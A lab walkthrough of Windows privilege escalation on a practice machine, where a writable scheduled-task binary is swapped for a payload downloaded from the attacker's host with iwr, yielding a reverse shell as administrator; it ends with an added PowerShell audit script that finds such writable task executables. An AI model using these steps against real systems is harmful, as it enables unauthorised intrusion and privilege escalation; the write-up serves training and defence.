Scheduled Task


There appears to be a scheduled task executing C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt at an interval of 5 minutes. As the current user is able to modify the directory as well as the binary itself, this could be a privilege escalation vector if the scheduled task is running with a higher privilege.

PS C:\Backup> mv TFTP.EXE TFTP.EXE.old

Changing the name of the original binary to TFTP.EXE.old

PS C:\Backup> iwr -uri http://192.168.45.215/TFTP.EXE -OutFile .\TFTP.EXE

Delivering the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ nnc 1234        
listening on [any] 1234 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.134.53] 64957
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
 whoami
slort\administrator
 
C:\WINDOWS\system32> hostname
 hostname
slort
 
C:\WINDOWS\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.134.53
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.134.254

System Level Compromise
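
The condition abused above is a scheduled task whose executable, or the folder holding it, is writable by a lower-privileged account. The following PowerShell audit is an added example, not part of the original notes: it lists every scheduled-task action whose target file or parent directory grants write-type rights to anyone outside a trusted set. The trusted set (SYSTEM, Administrators, TrustedInstaller) and the choice of write-type rights are assumptions to adjust per environment.

```powershell
# Added example: report scheduled-task executables (and their folders) that
# principals other than SYSTEM/Administrators/TrustedInstaller can modify.
# Run elevated so every task and ACL is readable.

$trusted = @(
    'S-1-5-18',      # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',  # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464' # TrustedInstaller
)
# Rights that let a principal replace or alter the target, or re-ACL it.
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$sidType   = [System.Security.Principal.SecurityIdentifier]

function Get-UntrustedWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    # Ask for SIDs directly so orphaned or renamed accounts still compare correctly.
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs (e.g. CREATOR OWNER) do not apply to this object itself.
        if ($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
        if (-not ($ace.FileSystemRights -band $writeBits)) { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        $ace
    }
}

foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no executable
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
        if (-not [System.IO.Path]::IsPathRooted($exe)) { continue }  # bare names resolve via PATH; not covered here
        # Check both the binary and its folder: write access to either allows replacement.
        foreach ($target in $exe, (Split-Path -Parent $exe)) {
            if (-not (Test-Path -LiteralPath $target)) { continue }
            try { $aces = Get-UntrustedWriteAce -Path $target } catch { continue }
            foreach ($ace in $aces) {
                [pscustomobject]@{
                    Task     = $task.TaskPath + $task.TaskName
                    RunAs    = $task.Principal.UserId
                    Target   = $target
                    Identity = $ace.IdentityReference.Value   # SID of the principal with write access
                    Rights   = $ace.FileSystemRights
                }
            }
        }
    }
}
```

Any row whose RunAs account is more privileged than the listed Identity marks a task to fix, either by moving the binary to a protected location or by removing the write ACE from the file and its folder.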